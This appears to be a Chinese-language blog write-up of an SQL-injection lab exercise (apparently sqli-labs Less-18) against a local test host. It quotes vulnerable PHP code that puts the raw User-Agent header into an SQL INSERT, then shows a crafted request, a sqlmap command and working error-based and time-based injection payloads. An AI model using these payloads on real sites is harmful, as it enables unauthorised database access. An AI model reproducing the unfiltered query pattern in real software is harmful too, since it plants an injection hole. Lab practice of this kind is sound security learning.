玩了玩Http header Injection,发现杀伤力还有隐蔽程度都挺高的,而且利用难度也高,我想靠纯手注基本不知道怎么搞,所以咯,这次的注入只能动用sqlmap了
首先是看下代码
$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1)
{
echo '<font color= "#FFFF00" font size = 3 >';
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
mysql_query($insert);
//echo 'Your IP ADDRESS is: ' .$IP;
echo "</font>";
//echo "<br>";
echo '<font color= "#0000ff" font size = 3 >';
echo 'Your User Agent is: ' .$uagent;
echo "</font>";
echo "<br>";
print_r(mysql_error());
echo "<br><br>";
echo '<img src="../images/flag.jpg" />';
echo "<br>";
}
else
{
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
print_r(mysql_error());
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}
}
其它部分也懒得截了,总之代码的意思是先检查username和passwd,如果又返回值的话,输出Your User Agent is: ‘ .$uagent;
都说了是Http header injection了,所以基本就在这个位置了,实际通过代码也能看出来,HTTP_USER_AGENT的环境变量进来之后完全没过滤,直接就调用了,而且代码输出
mysql_error(),所以我的想法就是报错注入了
首先构造POST的包
POST /sql/Less-18/?id=1 HTTP/1.1
Host: 192.168.150.129
User-Agent: '
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.150.129/sql/Less-18/?id=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
uname=admin&passwd=admin&submit=Submit
用弱口令的admin,事后证明我是对的,因为User-Agent的值是单引号,所以应该是会报错的,看看Burpsuite中的回显
<br>Your IP ADDRESS is: 192.168.150.1<br><font color= "#FFFF00" font size = 3 ></font><font color= "#0000ff" font size = 3 >Your User Agent is: '</font><br>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '192.168.150.1', 'admin')' at line 1<br><br><img src="../images/flag.jpg" /><br>
报错了,这时候把POST包保存下来,扔到Sqlmap中去
root@Lang:~# sqlmap -r '/root/Desktop/1' --headers="User-Agent:*" --banner
这样便能检测到User-Agent
custom injection marking character ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] y
然后让他继续跑下去
基本结果就出来了
(custom) HEADER parameter 'User-Agent #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n sqlmap identified the following injection points with a total of 287 HTTP(s) requests: --- Parameter: User-Agent #1* ((custom) HEADER) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: ' AND (SELECT 4391 FROM(SELECT COUNT(*),CONCAT(0x71716b7a71,(SELECT (CASE WHEN (4391=4391) THEN 1 ELSE 0 END)),0x717a7a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'BVRp'='BVRp Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: ' AND (SELECT * FROM (SELECT(SLEEP(5)))JPDK) AND 'qTgm'='qTgm --- [22:55:44] [INFO] the back-end DBMS is MySQL
给出了明确的Payload
最后得出了结果
web server operating system: Linux Debian 7.0 (wheezy) web application technology: Apache 2.2.22, PHP 5.4.39 back-end DBMS: MySQL 5.0 banner: '5.5.43-0+deb7u1'
关于Http header injection的最基本的利用就是这些了,万变不离其宗,当你掌握的基础,那么深入学习将会很容易,因为那些深入的知识都是按照基础演变的
L_AnG 